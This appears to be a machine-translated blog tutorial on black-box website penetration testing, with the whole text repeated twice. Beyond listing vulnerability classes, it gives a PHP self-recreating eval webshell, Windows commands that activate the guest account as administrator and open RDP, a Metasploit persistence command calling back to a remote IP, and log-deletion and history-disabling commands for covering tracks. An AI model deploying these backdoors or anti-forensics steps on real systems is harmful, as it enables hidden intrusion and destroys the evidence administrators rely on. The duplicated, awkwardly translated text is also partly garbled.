penetration testing
Penetration testing is to use our penetration knowledge to penetrate the website step by step, discover the loopholes and hidden risks in it, and then write a test report and provide it to our customers. According to the test report written by us, the customer repairs the website's vulnerabilities to prevent hackers from invading!
The premise of penetration testing is that we have to be authorized by the user before we can penetrate the website. It is against the law for us to perform a penetration test on a website without the client's authorization. On June 1 last year, China promulgated the "Network Security Law", which has legal constraints on cybercrime, and if you don't understand it, move --> Network Security Law
Penetration testing is divided into white box testing and black box testing
1. White box testing is to infiltrate the target website while knowing the source code and other information, which is similar to code analysis
2. Black box testing is to only tell us the url of this website, and not tell anything else, and then let you infiltrate, simulating the penetration of hackers on the website
We are now simulating a hacker to conduct a penetration test on a website. This is a black box test. We only know the URL of the website, and we don't know any other information.
Next, I will share with you the process and ideas of black box penetration testing!
When we have identified a target for infiltration, what should we do first?
collect message
The first step is to collect information. As the saying goes, knowing yourself, knowing your enemy, and winning every battle, we can find out a series of information about the website according to the URL of the website. Through the URL, we can find a series of information such as the IP of the website, the operating system of the website, the scripting language, whether there are other websites on the server, and so on.
Vulnerability detection
When we have collected enough information, we will start to detect the vulnerability of the website. Detect whether there are some common web vulnerabilities in the website, such as:
SQL Injection
XSS Cross Site Scripting
CSRF Cross Site Request Forgery
XXE vulnerability
SSRF server request forgery vulnerability
file inclusion vulnerability
file upload vulnerability
file parsing vulnerability
remote code execution vulnerability
CORS cross-domain resource sharing vulnerability
unauthorized access vulnerability
directory browsing vulnerability and arbitrary file read/download vulnerability
These are some of the vulnerabilities often found on the website, and there are some website vulnerabilities, I will not list them here.
There are also many website vulnerability scanning tools, such as:
AWVS
AppScan
Owasp-Zap
Nessus
website vulnerability scanning tools I will list these types, there are many more, these are the most commonly used ones!
exploit
When we detect a vulnerability in the website, we will exploit the vulnerability. Different vulnerabilities have different exploitation tools. In many cases, it is difficult for us to obtain the webshell of a website through a vulnerability. We often need to combine several vulnerabilities to obtain the webshell. Commonly used exploit tools are as follows:
SQL injection
XSS Cross Site Scripting
Packet capture tool
File upload vulnerability, if uploading a vulnerability, we usually upload a sentence Trojan horse, and then get the webshell
However, after obtaining the webshell, the general permissions are very low, so we need to escalate the privileges. We can choose to rebound a MSF-type shell privilege escalation: Metasploit Framework (MSF), Msfvenonm generates a backdoor Trojan, or rebound a CobaltStrike-type shell: Cobalt Strike, MSF and CobaltStrike linkage can also be used: MSF and CobaltStrike linkage can also use other rights escalation: Windows, Linux
Intranet forwarding
After we get the web shell of the website, if we want to get information about the host, we can replace the web shell of the host with the shell of MSF. Generate a Trojan horse directly, and then execute the Trojan horse in the kitchen knife, we can receive a MSF type shell.
If we want to further detect the information of the intranet host, we need to perform intranet forwarding. We cannot directly communicate with the host on the intranet, so we need to use the obtained webshell website server to communicate with the host on the intranet.
Intranet lateral penetration
When we have obtained the authority of the external network server and entered the system, we must try our best to find the information we want from the server.
For windows hosts, we should look through the directory more, and there may be many unexpected results. Many people are used to storing account passwords and other easy-to-forget things in the memo or on the desktop. We can also find the connection file of the database, and view sensitive information such as the account password of the database connection. When we have obtained the account password of the windows host, or created a new user ourselves, in order not to be discovered by the website administrator and not to damage the server. We try not to use remote desktop. Because the use of remote desktop is more dynamic, if the server administrator is also logging in at this time, and you log in through remote desktop at this time, the administrator will be squeezed out, and you will be kicked out by the administrator soon. For the situation where remote desktop login is really required, we try not to create a new user to log in. We can activate the guest user, then add it to the administrators group, and log in as the guest user. After RDP remote login, we can check what software is on other users' desktops and other directories. The targets we are looking for are as follows.
FTP-related software
Database-related software
Open the browser, check the history, and check whether some websites have saved user passwords. Use tools to view the passwords saved by the browser
From the account passwords found on the host, we can make a dictionary. When blasting other machines on the intranet, it is likely to be the same password.
-
net user guest /active:yes #Activate guest user
-
net localgroup administrators guest /add #Add guest users to
-
net user guest password #Change guest user password
-
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " " Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #Open port 3389
For Linux hosts, we can view open port numbers, open services, and intranet hosts connected to them. Check the directory to find the website database connection password. In short, it is to find as many account passwords as possible, which is very useful for account blasting on the intranet.
After building a tunnel to connect to the intranet, we first need to discover assets on the intranet. But judging the surviving network segments of the intranet is a big problem. It is very likely that there are 10.0.0.0/8, 172.16.0.0/16, and 192.168.0.0/24 network segments in the intranet at the same time. This requires us to detect it with a scanner. Intranet scanning via proxy is not recommended to use nmap. If you scan through a proxy on the local host, if you can use a graphical interface, you can use RouterScan, Yujian high-speed TCP full-port scanner, and IIS_Scanner. But pay attention to lower the thread, otherwise the agent will easily collapse. If you use a command-line scanner, you can use the S-scanner. After scanning the intranet assets and port openness, for port 445, you can send a wave of MS17_010. But pay attention to calling 445 through a proxy, which is different from the previous ones. For port 3389, a wave of CVE-2019-0708 can be hit. For ports such as 1433/3306/6379, you can try to blast, and the success rate of using the account password collected before is higher.
Authority maintenance
After obtaining the permission of the target host, it is very likely that we could not obtain what we wanted at that time, and we needed to do a long-term latency, especially in the internal network penetration, which required long-term information collection. At this time, authority maintenance is very important. We need to maintain the existing permissions we have been given.
Web back door
1: Hide the backdoor file (set the file as hidden)
2: Undead horse, the script creates test.php to the server every 5 seconds, and writes a sentence to avoid killing the Trojan horse. Combined with the attrib command to hide files, it is better to create a backdoor.
-
<?php
-
set_time_limit( 0 );//Program execution time
-
ignore_user_abort( 1 );//The script still runs after closing the terminal
-
unlink(__FILE__);//The full name of the file
-
while(
1){
-
file_put_contents(
'test.php',
'<?php $a=array($_REQUEST["x"]=>"3");
-
$b=array_keys($a)[0];
-
eval($b);?>');
-
sleep(
5);
-
}
-
?>
3: The 404 page hides the backdoor, or inserts the backdoor code in other self-contained files
Note : The above several backdoor methods can be detected by tools such as D-Shield
Windows system
1: Create a hidden user, add $ after the user name
2: Place the Trojan horse file in the startup directory, as long as the target machine restarts, it will connect back to our remote control
3: The persistence module in MSF, executing commands can make the target machine automatically connect to the remote control at regular intervals. but easy to spot
-
#The rebound time interval is 5s, it will automatically connect to port 4444 of 192.168.27, the disadvantage is that it is easy to be killed by anti-virus software
-
run persistence -X -i
5 -p
8888 -r
192.168
.10
.27
-
-
#Then it created this file on the target machine: C:\Windows\TEMP\CJzhFlNOWa.vbs, and added the service to the registry, it will start as long as it is turned on
4: In the domain environment, find a way to obtain the hash of the krbtgt user, which can be used for pass-the-ticket attacks. And generally the user's password does not change frequently.
5: shift back door
6: Remote Desktop Session Hijacking
Linux system
1: SSH backdoor
2: crontab timing task
3: SSH public key
4: Create a user with SUID=0
Trace removal
When we achieve our goal, sometimes it is just to hack into the website and hang black pages to show off; or leave a back door on the website as a broiler, and go for a stroll when we are free; or hang a mining Trojan; but Please don't do these things, they are illegal!
I'm just here to teach you how to remove some of the traces we left after infiltrating, but it can't be completely removed. It is impossible to completely remove the traces of intrusion! The main reason is to increase the time cost and labor cost for the administrator to discover the intruder. As long as the administrator wants to check, no matter how you clear it, you can still find it.
The most important thing is to hide your identity. The best way is to hang an agent before the infiltration, and then remove the traces after the infiltration.
Windows system
1: If it is a windows system, you can use the clearev command in MSF to clear the traces
2: If 3389 has logged in remotely, you need to clear the traces of mstsc
3: Execute the command to clear the log:
del %WINDR%\* .log /a/s/q/f
4: If it is a web application, find the web log file and delete it
Linux system
1: If it is a Linux system, after obtaining the permission, execute the following command, and the entered command will not be recorded
export HISTFILE=/dev/null export HISTSIZE=0
2: Delete the log files in the /var/log directory
3: If it is a web application, find the web log file and delete it
Writing a penetration test report
After completing the penetration test, we need to write a penetration test report for this penetration test. Clearly write where there are vulnerabilities and how to fix them. In order to facilitate website administrators to patch these vulnerabilities and risks according to our penetration test report, and prevent hackers from being attacked!
Everything we do is to create a safer and more trustworthy network environment. Please remember not to use this article to commit illegal and criminal acts!
penetration testing
Penetration testing is to use our penetration knowledge to penetrate the website step by step, discover the loopholes and hidden risks in it, and then write a test report and provide it to our customers. According to the test report written by us, the customer repairs the website's vulnerabilities to prevent hackers from invading!
The premise of penetration testing is that we have to be authorized by the user before we can penetrate the website. It is against the law for us to perform a penetration test on a website without the client's authorization. On June 1 last year, China promulgated the "Network Security Law", which has legal constraints on cybercrime, and if you don't understand it, move --> Network Security Law
Penetration testing is divided into white box testing and black box testing
1. White box testing is to infiltrate the target website while knowing the source code and other information, which is similar to code analysis
2. Black box testing is to only tell us the url of this website, and not tell anything else, and then let you infiltrate, simulating the penetration of hackers on the website
We are now simulating a hacker to conduct a penetration test on a website. This is a black box test. We only know the URL of the website, and we don't know any other information.
Next, I will share with you the process and ideas of black box penetration testing!
When we have identified a target for infiltration, what should we do first?
collect message
The first step is to collect information. As the saying goes, knowing yourself, knowing your enemy, and winning every battle, we can find out a series of information about the website according to the URL of the website. Through the URL, we can find a series of information such as the IP of the website, the operating system of the website, the scripting language, whether there are other websites on the server, and so on.
Vulnerability detection
When we have collected enough information, we will start to detect the vulnerability of the website. Detect whether there are some common web vulnerabilities in the website, such as:
SQL Injection
XSS Cross Site Scripting
CSRF Cross Site Request Forgery
XXE vulnerability
SSRF server request forgery vulnerability
file inclusion vulnerability
file upload vulnerability
file parsing vulnerability
remote code execution vulnerability
CORS cross-domain resource sharing vulnerability
unauthorized access vulnerability
directory browsing vulnerability and arbitrary file read/download vulnerability
These are some of the vulnerabilities often found on the website, and there are some website vulnerabilities, I will not list them here.
There are also many website vulnerability scanning tools, such as:
AWVS
AppScan
Owasp-Zap
Nessus
website vulnerability scanning tools I will list these types, there are many more, these are the most commonly used ones!
exploit
When we detect a vulnerability in the website, we will exploit the vulnerability. Different vulnerabilities have different exploitation tools. In many cases, it is difficult for us to obtain the webshell of a website through a vulnerability. We often need to combine several vulnerabilities to obtain the webshell. Commonly used exploit tools are as follows:
SQL injection
XSS Cross Site Scripting
Packet capture tool
File upload vulnerability, if uploading a vulnerability, we usually upload a sentence Trojan horse, and then get the webshell
However, after obtaining the webshell, the general permissions are very low, so we need to escalate the privileges. We can choose to rebound a MSF-type shell privilege escalation: Metasploit Framework (MSF), Msfvenonm generates a backdoor Trojan, or rebound a CobaltStrike-type shell: Cobalt Strike, MSF and CobaltStrike linkage can also be used: MSF and CobaltStrike linkage can also use other rights escalation: Windows, Linux
Intranet forwarding
After we get the web shell of the website, if we want to get information about the host, we can replace the web shell of the host with the shell of MSF. Generate a Trojan horse directly, and then execute the Trojan horse in the kitchen knife, we can receive a MSF type shell.
If we want to further detect the information of the intranet host, we need to perform intranet forwarding. We cannot directly communicate with the host on the intranet, so we need to use the obtained webshell website server to communicate with the host on the intranet.
Intranet lateral penetration
When we have obtained the authority of the external network server and entered the system, we must try our best to find the information we want from the server.
For windows hosts, we should look through the directory more, and there may be many unexpected results. Many people are used to storing account passwords and other easy-to-forget things in the memo or on the desktop. We can also find the connection file of the database, and view sensitive information such as the account password of the database connection. When we have obtained the account password of the windows host, or created a new user ourselves, in order not to be discovered by the website administrator and not to damage the server. We try not to use remote desktop. Because the use of remote desktop is more dynamic, if the server administrator is also logging in at this time, and you log in through remote desktop at this time, the administrator will be squeezed out, and you will be kicked out by the administrator soon. For the situation where remote desktop login is really required, we try not to create a new user to log in. We can activate the guest user, then add it to the administrators group, and log in as the guest user. After RDP remote login, we can check what software is on other users' desktops and other directories. The targets we are looking for are as follows.
FTP-related software
Database-related software
Open the browser, check the history, and check whether some websites have saved user passwords. Use tools to view the passwords saved by the browser
From the account passwords found on the host, we can make a dictionary. When blasting other machines on the intranet, it is likely to be the same password.
-
net user guest /active:yes #Activate guest user
-
net localgroup administrators guest /add #Add guest users to
-
net user guest password #Change guest user password
-
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " " Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #Open port 3389
For Linux hosts, we can view open port numbers, open services, and intranet hosts connected to them. Check the directory to find the website database connection password. In short, it is to find as many account passwords as possible, which is very useful for account blasting on the intranet.
After building a tunnel to connect to the intranet, we first need to discover assets on the intranet. But judging the surviving network segments of the intranet is a big problem. It is very likely that there are 10.0.0.0/8, 172.16.0.0/16, and 192.168.0.0/24 network segments in the intranet at the same time. This requires us to detect it with a scanner. Intranet scanning via proxy is not recommended to use nmap. If you scan through a proxy on the local host, if you can use a graphical interface, you can use RouterScan, Yujian high-speed TCP full-port scanner, and IIS_Scanner. But pay attention to lower the thread, otherwise the agent will easily collapse. If you use a command-line scanner, you can use the S-scanner. After scanning the intranet assets and port openness, for port 445, you can send a wave of MS17_010. But pay attention to calling 445 through a proxy, which is different from the previous ones. For port 3389, a wave of CVE-2019-0708 can be hit. For ports such as 1433/3306/6379, you can try to blast, and the success rate of using the account password collected before is higher.
Authority maintenance
After obtaining the permission of the target host, it is very likely that we could not obtain what we wanted at that time, and we needed to do a long-term latency, especially in the internal network penetration, which required long-term information collection. At this time, authority maintenance is very important. We need to maintain the existing permissions we have been given.
Web back door
1: Hide the backdoor file (set the file as hidden)
2: Undead horse, the script creates test.php to the server every 5 seconds, and writes a sentence to avoid killing the Trojan horse. Combined with the attrib command to hide files, it is better to create a backdoor.
-
<?php
-
set_time_limit( 0 );//Program execution time
-
ignore_user_abort( 1 );//The script still runs after closing the terminal
-
unlink(__FILE__);//The full name of the file
-
while(
1){
-
file_put_contents(
'test.php',
'<?php $a=array($_REQUEST["x"]=>"3");
-
$b=array_keys($a)[0];
-
eval($b);?>');
-
sleep(
5);
-
}
-
?>
3: The 404 page hides the backdoor, or inserts the backdoor code in other self-contained files
Note : The above several backdoor methods can be detected by tools such as D-Shield
Windows system
1: Create a hidden user, add $ after the user name
2: Place the Trojan horse file in the startup directory, as long as the target machine restarts, it will connect back to our remote control
3: The persistence module in MSF, executing commands can make the target machine automatically connect to the remote control at regular intervals. but easy to spot
-
#The rebound time interval is 5s, it will automatically connect to port 4444 of 192.168.27, the disadvantage is that it is easy to be killed by anti-virus software
-
run persistence -X -i
5 -p
8888 -r
192.168
.10
.27
-
-
#Then it created this file on the target machine: C:\Windows\TEMP\CJzhFlNOWa.vbs, and added the service to the registry, it will start as long as it is turned on
4: In the domain environment, find a way to obtain the hash of the krbtgt user, which can be used for pass-the-ticket attacks. And generally the user's password does not change frequently.
5: shift back door
6: Remote Desktop Session Hijacking
Linux system
1: SSH backdoor
2: crontab timing task
3: SSH public key
4: Create a user with SUID=0
Trace removal
When we achieve our goal, sometimes it is just to hack into the website and hang black pages to show off; or leave a back door on the website as a broiler, and go for a stroll when we are free; or hang a mining Trojan; but Please don't do these things, they are illegal!
I'm just here to teach you how to remove some of the traces we left after infiltrating, but it can't be completely removed. It is impossible to completely remove the traces of intrusion! The main reason is to increase the time cost and labor cost for the administrator to discover the intruder. As long as the administrator wants to check, no matter how you clear it, you can still find it.
The most important thing is to hide your identity. The best way is to hang an agent before the infiltration, and then remove the traces after the infiltration.
Windows system
1: If it is a windows system, you can use the clearev command in MSF to clear the traces
2: If 3389 has logged in remotely, you need to clear the traces of mstsc
3: Execute the command to clear the log:
del %WINDR%\* .log /a/s/q/f
4: If it is a web application, find the web log file and delete it
Linux system
1: If it is a Linux system, after obtaining the permission, execute the following command, and the entered command will not be recorded
export HISTFILE=/dev/null export HISTSIZE=0
2: Delete the log files in the /var/log directory
3: If it is a web application, find the web log file and delete it
Writing a penetration test report
After completing the penetration test, we need to write a penetration test report for this penetration test. Clearly write where there are vulnerabilities and how to fix them. In order to facilitate website administrators to patch these vulnerabilities and risks according to our penetration test report, and prevent hackers from being attacked!
Everything we do is to create a safer and more trustworthy network environment. Please remember not to use this article to commit illegal and criminal acts!